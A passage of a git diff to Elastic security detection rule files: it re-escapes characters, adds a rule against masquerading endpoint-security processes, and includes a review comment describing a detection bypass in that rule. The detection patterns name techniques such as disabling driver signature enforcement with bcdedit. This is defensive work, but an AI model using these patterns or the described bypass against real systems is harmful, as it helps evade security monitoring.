pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious 
artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json
index ecc51d23622..b545edc84f5 100644
--- a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json
index 9f74e30fd83..13f58349e7d 100644
--- a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json
index 7e360daecb6..9dbe5d94a1b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json
index 2c8370e7365..0812dc33a35 100644
--- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json
index e9ca871699b..63e8e999d19 100644
--- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json
index 006be6a6576..85d93fbb80e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json
index 1c3f76946d6..685ae416cb6 100644
--- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json
index ce3d72a3d02..a1184f55a46 100644
--- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_109.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_109.json
new file mode 100644
index 00000000000..e561d9ba915
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_109.json
@@ -0,0 +1,97 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious Endpoint Security Parent Process",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\n \"?:\\\\Program Files\\\\Elastic\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\explorer.exe\"\n ) and\n not (\n process.parent.executable : (\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\System32\\\\SecurityHealthHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n ) and\n process.args : (\n \"test\", \"version\",\n \"top\", \"run\",\n \"*help\", \"status\",\n \"upgrade\", \"/launch\",\n \"/enable\"\n )\n )\n \n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1036",
+ "name": "Masquerading",
+ "reference": "https://attack.mitre.org/techniques/T1036/",
+ "subtechnique": [
+ {
+ "id": "T1036.005",
+ "name": "Match Legitimate Name or Location",
+ "reference": "https://attack.mitre.org/techniques/T1036/005/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json
index f8ccc1b4208..3a82a5f0f28 100644
--- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
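Review bot: The trailing `not ( process.parent.executable : (cmd.exe, SecurityHealthHost.exe, powershell.exe) and process.args : (...) )` carve-out in the new rule's query suppresses the alert as soon as any element of `process.args` matches one of the listed tokens, so a binary merely named `esensor.exe` or `elastic-endpoint.exe` that an attacker launches from a shell as `esensor.exe run` or `esensor.exe status` is excluded, which is exactly the T1036.005 masquerading case the rule is tagged for, because the positive match is on `process.name` alone. Consider scoping that exclusion to the genuine binary, e.g. adding `process.executable : "?:\\Program Files\\Elastic\\*"` inside the `not (...)` clause (or a code-signature check, if the Endgame and Defend sources in `index` populate those fields), and listing the added field in `required_fields` so the rule's field contract stays accurate. Unlike the other rule versions touched in this PR, this version ships no `note` investigation guide, so the `/* add FPs here */` marker is the only tuning guidance an analyst gets; a short guide pointing to the parent-executable and args exclusions would help operators avoid over-broad exceptions.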
diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json
index d1daa6d6354..27cdb0c85db 100644
--- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Built-in tools", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n",
 "related_integrations": [
 {
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json
index 9e84f8f3a93..0751681f966 100644
--- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Code Signing Policy Modification Through Built-in tools",
- "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
